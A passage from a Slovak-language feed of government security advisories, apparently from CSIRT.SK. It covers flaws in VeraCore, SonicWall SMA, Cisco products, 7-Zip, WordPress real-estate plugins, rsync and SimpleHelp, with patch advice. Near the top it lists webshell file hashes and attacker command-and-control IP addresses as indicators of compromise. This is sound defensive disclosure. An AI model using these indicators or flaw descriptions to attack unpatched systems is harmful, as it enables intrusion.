<li><strong>Únik citlivých informácií</strong></li>



<li><strong>Modifikácia informácií</strong></li>



<li><strong>Získanie prístupu do systému</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Pre odstránenie CVE-2024-57968 aktualizujte Advantive VeraCore aspoň na verziu 2024.4.2.1. Pre CVE-2025-25181 aktualizácia zatiaľ nie je dostupná. Odporúčame preveriť prítomnosť IoC v logoch sieťových a bezpečnostných prvkov. </p>



<p><strong>IoC (kompletná informácia </strong><a href="https://intezer.com/blog/research/xe-group-exploiting-zero-days/"><strong>tu</strong></a><strong>):</strong></p>



<p>SHA1: 032dd95a1299f37aaa76318945e030eb7da94da9 – webshell z&nbsp;roku 2020</p>



<p>SHA1: 84e7f4ff1f93a4297c2e2c4e54f14edb18396b60 – webshell z&nbsp;roku 2020</p>



<p>SHA1: 16db01fe25b0c09e18d13f38c88a4ead5d10e323 – webshell z&nbsp;roku 2020</p>



<p>SHA1: ede5ddb97b98d80440553b23dfc19fdb4adc7499 – webshell z&nbsp;roku 2024</p>



<p>SHA1: 9e928a26aa3c0e6eb8e709fc55ea12dcf7e02ff9 – zraniteľná verzia upload.aspx</p>



<p>171.227.250.249 – nahrávanie webshellov</p>



<p>123.20.29.193 – interakcia s webshellmi</p>



<p>222.253.102.94 – IP adresa C&amp;C servera XE Group a interakcia s webshellmi</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://thehackernews.com/2025/02/xe-hacker-group-exploits-veracore-zero.html">https://thehackernews.com/2025/02/xe-hacker-group-exploits-veracore-zero.html</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-57968">https://nvd.nist.gov/vuln/detail/CVE-2024-57968</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-25181">https://nvd.nist.gov/vuln/detail/CVE-2025-25181</a></li>



<li><a href="https://www.zero-day.cz/database/960/">https://www.zero-day.cz/database/960/</a></li>



<li><a href="https://www.zero-day.cz/database/958/">https://www.zero-day.cz/database/958/</a></li>



<li><a href="https://intezer.com/blog/research/xe-group-exploiting-zero-days/">https://intezer.com/blog/research/xe-group-exploiting-zero-days/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1983/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačná správa CSIRT.SK – december 2024</title>
		<link>/posts/1976</link>
					<comments>/posts/1976#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 07 Feb 2025 11:57:42 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=1976</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci december 2024....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci december 2024. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.</strong></p>



<p>CSIRT.SK ako vládna jednotka na riešenie počítačových incidentov monitoruje lokálne aj globálne dianie v rámci informačnej bezpečnosti. Štandardne tento príspevok prináša prehľad udalostí a informácií   zozbieraných jednotkou CSIRT.SK pri svojej činnosti.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2025/02/MS202412.pdf" data-type="link" data-id="/wp-content/uploads/2025/02/MS202412.pdf">Mesačná správa – 12/2024 PDF (1 469 KB)</a></p>



<p>Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti <a href="https://csirt.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas">Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1976/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná kritická zero-day zraniteľnosť v zariadeniach SonicWall Secure Mobile Access 1000</title>
		<link>/posts/1941</link>
					<comments>/posts/1941#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 27 Jan 2025 16:16:57 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[SonicWall]]></category>
		<guid isPermaLink="false">/?p=1941</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/12/sonicwall-1.png" alt="" /></p>Spoločnosť SonicWall vydala bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú kritickú zero-day zraniteľnosť v zariadeniach SonicWall Secure Mobile Access série 1000....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/12/sonicwall-1.png" alt="" /></p>
<p><strong>Spoločnosť SonicWall vydala bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú kritickú zero-day zraniteľnosť v zariadeniach SonicWall Secure Mobile Access série 1000. CVE-2025-23006 možno zneužiť na vzdialené vykonanie systémových príkazov a&nbsp;získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>SonicWall Secure Mobile Access série 1000 vo verziách 12.4.3-02804 (platform-hotfix) a starších</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-23006 </strong>(CVSS skóre 9,8)</p>



<p>Kritická zraniteľnosť v manažmentových konzolách AMC (Appliance Management Console) a CMC (Central Management Console) spočíva v deserializácii nedôveryhodných dát a vzdialený neautentifikovaný útočník by ju mohol zneužiť na <strong>vykonanie príkazov v operačnom systéme</strong> a <strong>získanie úplnej kontroly nad systémom</strong>.</p>



<p><strong>Zraniteľnosť je v&nbsp;súčasnosti aktívne zneužívaná útočníkmi.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie príkazov</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Spoločnosť SonicWall odporúča vykonať bezodkladnú aktualizáciu zasiahnutých systémov aspoň na verziu 12.4.3-02854. Výrobca taktiež odporúča limitovať prístup k AMC a CMC manažmentovým rozhraniam len na dôveryhodné zdroje. <a href="https://www.sonicwall.com/techdocs/pdf/sma_1000-12-4-admin_guide.pdf#page=653"><strong>Kompletný návod</strong></a> môžete nájsť na stránke výrobu, v časti „Best Practices for Securing the Appliance“.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0002">https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0002</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/sonicwall-warns-of-sma1000-rce-flaw-exploited-in-zero-day-attacks/">https://www.bleepingcomputer.com/news/security/sonicwall-warns-of-sma1000-rce-flaw-exploited-in-zero-day-attacks/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1941/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosti v produktoch Cisco Meeting Management, Secure Endpoint Connector a BroadWorks</title>
		<link>/posts/1939</link>
					<comments>/posts/1939#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 27 Jan 2025 16:15:25 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Cisco]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<guid isPermaLink="false">/?p=1939</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>Spoločnosť Cisco vydala bezpečnostné aktualizácie na svoje produkty Meeting Management, Secure Endpoint Connector (Linux, Mac a Windows verzie), Secure Endpoint...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>
<p><strong>Spoločnosť Cisco vydala bezpečnostné aktualizácie na svoje produkty Meeting Management, Secure Endpoint Connector (Linux, Mac a Windows verzie), Secure Endpoint Private Cloud a BroadWorks, ktoré opravujú viaceré zraniteľnosti. Kritickú zraniteľnosť CVE-2025-20156 v&nbsp;Cisco Meeting Management možno zneužiť na eskaláciu privilégií a&nbsp;získanie úplnej kontroly nad systémom. Ostatné zraniteľnosti umožňujú zneprístupnenie služby.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Cisco Meeting Management vo verziách starších ako 3.9.1 a 3.10</li>



<li>Cisco Secure Endpoint Connector for Linux vo verziách starších ako 1.25.1</li>



<li>Cisco Secure Endpoint Connector for Mac vo verziách starších ako 1.24.4</li>



<li>Cisco Secure Endpoint Connector for Linux vo verziách starších ako 1.25.1</li>



<li>Cisco Secure Endpoint Connector for Windows 7.5.X vo verziách starších ako 7.5.20</li>



<li>Cisco Secure Endpoint Connector for Windows 8.4.X vo verziách starších ako 8.4.3</li>



<li>Cisco Secure Endpoint Private Cloud vo verziách starších ako 4.2.0 (bez aktualizácie konektorov)</li>



<li>Cisco BroadWorks vo verziách starších ako RI.2024.11</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong><u>Cisco Meeting Management:</u></strong></p>



<p><strong>CVE-2025-20156 </strong>(CVSS skóre 9,9)</p>



<p>Kritická zraniteľnosť o označením CVE-2025-20156 spočíva v nedostatočnom overovaní autorizácie v rámci REST API. Vzdialený autentifikovaný útočník by ju zaslaním špeciálne vytvorených API požiadaviek mohol zneužiť na <strong>eskaláciu privilégií</strong> na úroveň administrátora a <strong>získanie úplnej kontroly </strong>nad uzlami manažovanými prostredníctvom Cisco Meeting Management.</p>



<p><strong><u>Cisco Secure Endpoint Connector (Linux, Max, Windows verzie), Cisco Secure Endpoint Private Cloud:</u></strong></p>



<p><strong>CVE-2025-20128 </strong>(CVSS skóre 5,3)</p>



<p>Zraniteľnosť sa nachádza v komponente ClamAV a spočíva v&nbsp;podtečení celočíselnej premennej, ktoré možno zneužiť na pretečenie medzipamäte haldy počas dešifrovania OLE2 (Object Linking and Embedding 2). Vzdialený neautentifikovaný útočník by ju podvrhnutím špeciálne vytvorených súborov mohol zneužiť na <strong>deaktiváciu antivírusového komponentu</strong>. Na zraniteľnosť je v súčasnosti <strong>dostupný aj proof-of-concept</strong> kód demonštrujúci postup jej zneužitia.</p>



<p><strong>Pozn.: Cisco produkty&nbsp; Secure Email Gateway a Secure Web Appliance nie sú predmetnou zraniteľnosťou zasiahnuté.</strong></p>



<p><strong><u>Cisco BroadWorks:</u></strong></p>



<p><strong>CVE-2025-20165 </strong>(CVSS skóre 7,5)</p>



<p>Nesprávny manažment pamäte v&nbsp;rámci komponentu pre spracovanie SIP (Session Initiation Protocol) by vzdialený neautentifikovaný útočník zaslaním veľkého množstva špeciálne vytvorených SIP požiadaviek mohol zneužiť na zahltenie dostupných prostriedkov zariadenia a&nbsp;<strong>zneprístupnenie služby</strong>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>



<li><strong>Zneprístupnenie služby</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Odporúčame vykonať bezodkladnú aktualizáciu Cisco Meeting Management na verziu 3.9.1 alebo 3.10, Cisco Secure Endpoint Connector na verzie 1.25.1 (Linux), 1.24.4 (Mac), 7.5.20 alebo 8.4.3 (Windows), Secure Endpoint Private Cloud na verziu 4.2.0 a&nbsp;Cisco BroadWorks na verziu RI.2024.11.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cmm-privesc-uy2Vf8pc">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cmm-privesc-uy2Vf8pc</a></li>



<li><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-clamav-ole2-H549rphA">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-clamav-ole2-H549rphA</a></li>



<li><a href="https://blog.clamav.net/2025/01/clamav-142-and-108-security-patch.html">https://blog.clamav.net/2025/01/clamav-142-and-108-security-patch.html</a></li>



<li><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-bw-sip-dos-mSySbrmt">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-bw-sip-dos-mSySbrmt</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/cisco-warns-of-denial-of-service-flaw-with-poc-exploit-code/">https://www.bleepingcomputer.com/news/security/cisco-warns-of-denial-of-service-flaw-with-poc-exploit-code/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1939/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť v 7-Zip umožňuje obídenie ochrany Mark-of-the-Web a vykonanie škodlivého kódu</title>
		<link>/posts/1937</link>
					<comments>/posts/1937#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 27 Jan 2025 15:52:17 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[7-Zip]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1937</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/11/7-Zip_Logo.png" alt="" /></p>Vývojári komprimačného nástroja 7-Zip vydali bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú zraniteľnosť. CVE-2025-0411 možno podvrhnutím špeciálne vytvorených súborov zneužiť na...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/11/7-Zip_Logo.png" alt="" /></p>
<p><strong>Vývojári komprimačného nástroja 7-Zip vydali bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú zraniteľnosť. CVE-2025-0411 možno podvrhnutím špeciálne vytvorených súborov zneužiť na obídenie bezpečnostného mechanizmu „Mark of the Web“ a vzdialené vykonanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>7-Zip vo verziách starších ako 24.09</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-0411 </strong>(CVSS skóre 7,0)</p>



<p>Zraniteľnosť s označením CVE-2025-0411 by vzdialený neautentifikovaný útočník podvrhnutím špeciálne vytvorených archívov mohol zneužiť na <strong>obídenie bezpečnostného mechanizmu MotW (Mark of the Web)</strong> a následné <strong>vykonanie škodlivého kódu</strong>. Pri dekomprimácii archívov stiahnutých z externých zdrojov nedochádza k propagácii indikátora MotW do metadát rozbaľovaných súborov. <strong>Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa, ktorý musí navštíviť škodlivú webovú stránku alebo otvoriť škodlivý súbor.</strong> Zraniteľnosť odhalili výskumníci zo Zero Day Initiative (ZDI).</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Odporúčame vykonať bezodkladnú aktualizáciu 7-Zip na verziu 24.09 alebo novšiu.</p>



<p><strong>Zdroje:</strong></p>



<p><a href="https://www.zerodayinitiative.com/advisories/ZDI-25-045/">https://www.zerodayinitiative.com/advisories/ZDI-25-045/</a></p>



<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-0411">https://www.cve.org/CVERecord?id=CVE-2025-0411</a></p>



<p><a href="https://www.openwall.com/lists/oss-security/2025/01/24/6">https://www.openwall.com/lists/oss-security/2025/01/24/6</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1937/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti vo WordPress pluginoch RealHomes Theme a Easy Real Estate</title>
		<link>/posts/1935</link>
					<comments>/posts/1935#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 27 Jan 2025 15:49:54 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Easy Real]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RealHomes]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">/?p=1935</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/WordPress_blue_logo.svg-min-e1753368452292-1024x735.png" alt="" /></p>Bezpečnostní výskumníci zo spoločnosti Patchstack zverejnili informácie o kritických zraniteľnostiach vo WordPress pluginoch RealHomes Theme a Easy Real Estate, ktoré...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/WordPress_blue_logo.svg-min-e1753368452292-1024x735.png" alt="" /></p>
<p><strong>Bezpečnostní výskumníci zo spoločnosti Patchstack zverejnili informácie o kritických zraniteľnostiach vo WordPress pluginoch RealHomes Theme a Easy Real Estate, ktoré možno zneužiť na eskaláciu privilégií, získanie administrátorského prístupu a úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>WordPress plugin RealHomes Theme vo verziách starších ako 4.3.6 (vrátane)</li>



<li>WordPress plugin Easy Real Estate vo verziách starších ako 2.2.6 (vrátane)</li>
</ul>



<p><em>Pozn.: Zraniteľnosti boli odhalené a nahlásené výrobcovi už v septembri 2024, ale zostávajú naďalej neopravené. Vzhľadom na ich závažnosť možno očakávať pokusy o&nbsp;ich zneužitie.</em></p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong><u>WordPress plugin RealHomes Theme:</u></strong><strong><u></u></strong></p>



<p><strong>CVE-2024-32444&nbsp; </strong>(CVSS skóre 9,8)</p>



<p>Kritická zraniteľnosť vo funkcii inspiry_ajax_register spočíva v&nbsp;nedostatočnom overovaní autorizácie v&nbsp;rámci mechanizmu registrácie používateľov. Vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených HTTP požiadaviek mohol zneužiť na <strong>vytvorenie administrátorského účtu</strong> a&nbsp;<strong>získanie úplnej kontroly nad systémom</strong>.</p>



<p><strong><u>WordPress plugin Easy Real Estate:</u></strong><strong><u></u></strong></p>



<p><strong>CVE-2024-32555 </strong>(CVSS skóre 9,8)</p>



<p>Kritická zraniteľnosť sa nachádza vo funkcionalite umožňujúcej prihlásenie prostredníctvom konta na sociálnych sieťach, kde v&nbsp;rámci funkcie ere_social_register nedochádza k&nbsp;overovaniu vlastníctva zadanej e-mailovej adresy. Vzdialený neautentifikovaný útočník by zaslaním špeciálne vytvorenej POST požiadavky obsahujúcej e-mailovú adresu existujúceho administrátorského účtu mohol zneužiť na <strong>získanie neoprávneného prístupu do systému</strong> a&nbsp;<strong>získanie úplnej kontroly nad systémom</strong>. Zneužitie zraniteľnosti vyžaduje, aby útočník disponoval e-mailovou adresou administrátora.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Získanie neoprávneného prístupu do systému</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Na uvedené zraniteľnosti v&nbsp;súčasnosti nie sú dostupné bezpečnostné aktualizácie. Administrátorom odporúčame predmetný plugin až do vydania záplat deaktivovať alebo odinštalovať, sledovať stránky výrobcu a&nbsp;po vydaní záplat vykonať bezodkladnú aktualizáciu zasiahnutých systémov. Taktiež odporúčame preveriť logy na prítomnosť pokusov o&nbsp;zneužitie zraniteľnosti a&nbsp;integritu databázy a&nbsp;samotného redakčného systému WordPress.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://patchstack.com/articles/unauthenticated-privilege-escalation-vulnerability-patched-in-real-home-theme/">https://patchstack.com/articles/unauthenticated-privilege-escalation-vulnerability-patched-in-real-home-theme/</a></li>



<li><a href="https://patchstack.com/database/wordpress/theme/realhomes/vulnerability/wordpress-real-homes-plugin-4-3-6-privilege-escalation-vulnerability">https://patchstack.com/database/wordpress/theme/realhomes/vulnerability/wordpress-real-homes-plugin-4-3-6-privilege-escalation-vulnerability</a></li>



<li><a href="https://patchstack.com/database/wordpress/plugin/easy-real-estate/vulnerability/wordpress-easy-real-estate-plugin-2-2-6-privilege-escalation-vulnerability">https://patchstack.com/database/wordpress/plugin/easy-real-estate/vulnerability/wordpress-easy-real-estate-plugin-2-2-6-privilege-escalation-vulnerability</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/critical-zero-days-impact-premium-wordpress-real-estate-plugins/">https://www.bleepingcomputer.com/news/security/critical-zero-days-impact-premium-wordpress-real-estate-plugins/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1935/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v nástroji pre prenos a synchronizáciu súborov Rsync</title>
		<link>/posts/1932</link>
					<comments>/posts/1932#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 17 Jan 2025 15:23:43 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Rsync]]></category>
		<guid isPermaLink="false">/?p=1932</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/01/rsync.jpg" alt="" /></p>Vývojári open source nástroja pre prenos a synchronizáciu súborov RSYNC vydali bezpečnostné aktualizácie, ktoré opravujú 6 zraniteľností, z čoho 1...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/01/rsync.jpg" alt="" /></p>
<p><strong>Vývojári open source nástroja pre prenos a synchronizáciu súborov RSYNC vydali bezpečnostné aktualizácie, ktoré opravujú 6 zraniteľností, z čoho 1 je označená ako kritická.</strong> <strong>CVE-2024-12084 možno zneužiť na vzdialené vykonanie kódu. Zreťazením zraniteľností CVE-2024-12084 a</strong> <strong>CVE-2024-12085 možno získať úplnú kontrolu nad zraniteľnými systémami.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Rsync vo verziách starších ako 3.4.0</li>
</ul>



<p><em>Pozn.:</em><em></em></p>



<ul>
<li><em>Zneužitie zraniteľnosti vyžaduje len anonymný read-access prístup</em></li>



<li><em>Rsync je </em><em>využívaný aj v&nbsp;rámci zálohovacích technológií Rclone, DeltaCopy, ChronoCopy, verejných repozitároch pre distribúciu súborov a&nbsp;v&nbsp;nástrojoch pre manažment serverov a&nbsp;cloudovej infraštruktúry</em></li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-12084 </strong>(CVSS skóre 9,8)</p>



<p>Kritická zraniteľnosť CVE-2024-12084 v komponente Rsync Daemon spočíva v nesprávnom overovaní dĺžky kontrolných súčtov. Zraniteľnosť možno zápisom do pamäte mimo povolených hodnôt zneužiť na <strong>vzdialené vykonanie kódu</strong>.</p>



<p><strong>CVE-2024-12085 </strong>(CVSS skóre 7,5)</p>



<p>Zraniteľnosť možno modifikáciou dĺžky kontrolných súčtov zneužiť na <strong>získanie neoprávneného prístupu k citlivým údajom</strong> v neinicializovanom zásobníku.</p>



<p><strong>CVE-2024-12086 </strong>(CVSS skóre 6,1)</p>



<p>CVE-2024-12086 by vzdialený útočník mohol zneužiť na <strong>enumeráciu a rekonštrukciu ľubovoľných súborov</strong> z klientov.</p>



<p><strong>CVE-2024-12087 </strong>(CVSS skóre 6,5)</p>



<p>CVE-2024-12087 spočíva v nesprávnom overovaní symbolických liniek pri použití režimu <em>&#8211;inc-recursive</em> a možno ju zneužiť na <strong>zápis súborov mimo povolené priečinky</strong>.</p>



<p>Zraniteľnosti s&nbsp;označením <strong>CVE-2024-12088 a CVE-2024-12747</strong> spočívajú v&nbsp;nesprávnom overovaní symbolických liniek a možno ich zneužiť na <strong>eskaláciu privilégií</strong>, vykonanie <strong>neoprávnených zmien v&nbsp;systéme</strong> a&nbsp;získanie <strong>neoprávneného prístupu k&nbsp;citlivým údajom</strong>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Neoprávnená zmena v systéme</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Na zraniteľných systémoch odporúčame vykonať bezodkladnú aktualizáciu Rync na verziu 3.4.0. Odporúčame tiež nastaviť vyžadovanie autentifikácie.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://kb.cert.org/vuls/id/952657">https://kb.cert.org/vuls/id/952657</a></li>



<li><a href="https://www.openwall.com/lists/oss-security/2025/01/14/3">https://www.openwall.com/lists/oss-security/2025/01/14/3</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/over-660-000-rsync-servers-exposed-to-code-execution-attacks/">https://www.bleepingcomputer.com/news/security/over-660-000-rsync-servers-exposed-to-code-execution-attacks/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1932/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti v nástroji pre vzdialený prístup SimpleHelp</title>
		<link>/posts/1928</link>
					<comments>/posts/1928#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 17 Jan 2025 15:10:22 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[SimpleHelp]]></category>
		<guid isPermaLink="false">/?p=1928</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/01/simplehelp.jpg" alt="" /></p>Vývojári riešenia pre vzdialený prístup SimpleHelp vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú 3 kritické zraniteľnosti. Kombináciou uvedených zraniteľností možno...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/01/simplehelp.jpg" alt="" /></p>
<p><strong>Vývojári riešenia pre vzdialený prístup SimpleHelp vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú 3 kritické zraniteľnosti. Kombináciou uvedených zraniteľností možno získať úplnú kontrolu nad zraniteľnými systémami.</strong><br>[<strong>Aktualizované 30.1.2025]</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>SimpleHelp v5.5 vo verziách starších ako v5.5.8</li>



<li>SimpleHelp v5.4 vo verziách starších ako v5.4.10</li>



<li>SimpleHelp v5.3 vo verziách starších ako v5.3.9</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-57726 </strong>(CVSS skóre 9,9)</p>



<p>Zraniteľnosť spočívajúcu v&nbsp;chýbajúcich mechanizmoch overovania oprávnení v&nbsp;rámci bližšie nešpecifikovaných funkcií v backende aplikácie možno zneužiť na <strong>eskaláciu privilégií</strong> štandardných technických účtov na administrátorské.</p>



<p><strong>CVE-2024-57727 </strong>(CVSS skóre 7,5)</p>



<p>Zraniteľnosť s&nbsp;identifikátorom CVE-2024-57727 možno zneužiť na <strong>stiahnutie ľubovoľných súborov zo súborového systému zariadenia</strong> a získať tým neoprávnený prístup k citlivým údajom, vrátane <strong>konfigurácie a prihlasovacích údajov</strong>. Uvedené údaje možno zneužiť na získanie neoprávneného prístupu do systému a&nbsp;realizáciu ďalších útokov. Zneužitie zraniteľnosti nevyžaduje autentifikáciu.</p>



<p><strong>CVE-2024-57728 </strong>(CVSS skóre 7,2)</p>



<p>CVE-2024-57728 by vzdialený autentifikovaný útočník s oprávneniami administrátora mohol zneužiť na <strong>nahratie súborov</strong> na SimpleServer hosty a <strong>vzdialené vykonanie kódu</strong>.</p>



<p><em>Aktualizácia 30.1.2025:</em></p>



<p><em>Bezpečnostní výskumníci z firmy Arctic Wolf varujú pred útokmi na systémy so SimpleHelp RMM. Na základe dostupných zistení útočníci zneužívajú uniknuté prihlasovacie údaje alebo zraniteľnosti CVE-2024-57726, CVE-2024-57727 a CVE-2024-57728 pre prienik do zraniteľných systémov.</em></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Neoprávnená zmena v systéme</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



